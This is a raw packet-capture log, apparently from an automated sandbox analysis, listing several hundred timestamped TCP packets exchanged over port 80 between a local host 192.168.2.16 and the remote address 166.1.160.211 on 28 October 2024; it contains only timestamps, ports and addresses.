                                                                                                                                                              Oct 28, 2024 19:46:20.866700888 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866733074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866750002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866767883 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866801977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866835117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866838932 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866869926 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866883039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866904020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866938114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.866961002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.866971016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867007017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867029905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867039919 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867074013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867110014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867557049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867592096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867610931 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867626905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867660046 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867682934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867693901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867728949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867750883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867762089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867795944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867811918 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867829084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867865086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867880106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867898941 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867932081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.867940903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.867968082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868021965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868393898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868463993 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868496895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868509054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868530989 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868565083 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868582964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868599892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868633032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868654013 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868665934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868699074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868714094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868732929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868766069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868779898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868799925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868834019 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868848085 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.868875980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.868920088 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869316101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869350910 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869384050 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869399071 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869417906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869452000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869462967 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869487047 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869519949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869529963 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.869556904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.869604111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.967561960 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973232985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973280907 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973334074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973337889 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973391056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973436117 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973440886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973475933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973510027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973520041 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973639965 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973675013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973686934 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973807096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973855019 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973859072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973892927 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973941088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.973947048 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.973977089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974010944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974028111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974045992 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974080086 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974109888 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974114895 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974149942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974164009 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974478006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974512100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974523067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974564075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974597931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974607944 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974632025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974668980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974684000 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974703074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974736929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974754095 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974771976 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.974818945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.974822998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975286961 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975341082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.975342989 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981950998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981973886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981983900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982017040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982028961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982049942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982084036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982116938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982116938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982151031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982167959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982383013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982417107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982428074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.037121058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.186069965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191597939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191720963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191817045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191821098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191854000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191889048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191903114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191925049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191971064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191977024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192013025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192047119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192058086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192122936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192157030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192168951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192192078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192226887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192235947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192342997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192375898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192397118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192413092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192459106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192820072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192854881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192888975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192903042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192956924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192989111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193006992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193023920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193059921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193068981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193176985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193209887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193223953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193244934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193289995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193711996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193746090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193780899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193790913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193815947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193850040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193861961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193883896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193929911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194066048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194098949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194133997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194144964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194169998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194212914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194526911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194581032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194614887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194628954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194756985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194789886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194804907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194824934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194859982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194870949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195012093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195044994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195060968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195079088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195120096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195411921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195501089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195537090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195547104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195640087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195672035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195683956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195705891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195739985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195746899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195877075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195909023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195919991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195944071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195995092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196321964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196377039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196423054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196475983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196543932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196577072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196588039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196700096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196732998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196747065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196768045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196800947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196819067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196988106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197021008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197033882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.197057009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197288990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.282704115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288326979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288362980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288419962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288454056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288459063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.295759916 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.295779943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.295813084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.295830965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.295846939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.295895100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.295909882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.295985937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296036005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296041965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296070099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296103001 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296117067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296138048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296185970 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296205044 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296458960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296493053 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296508074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296528101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296566010 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296593904 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296627045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296660900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296673059 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296696901 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296749115 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296753883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296782017 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296817064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296835899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296849966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296884060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296894073 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.296919107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.296963930 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.297333002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297385931 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297419071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297427893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.297454119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297498941 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.297558069 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297593117 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297626972 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297638893 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.297660112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.297707081 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.299495935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.299696922 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.299729109 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.299747944 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.299824953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.515165091 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.515352964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.542682886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.548429966 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.548465014 CET8049726166.1.160.211192.168.2.16
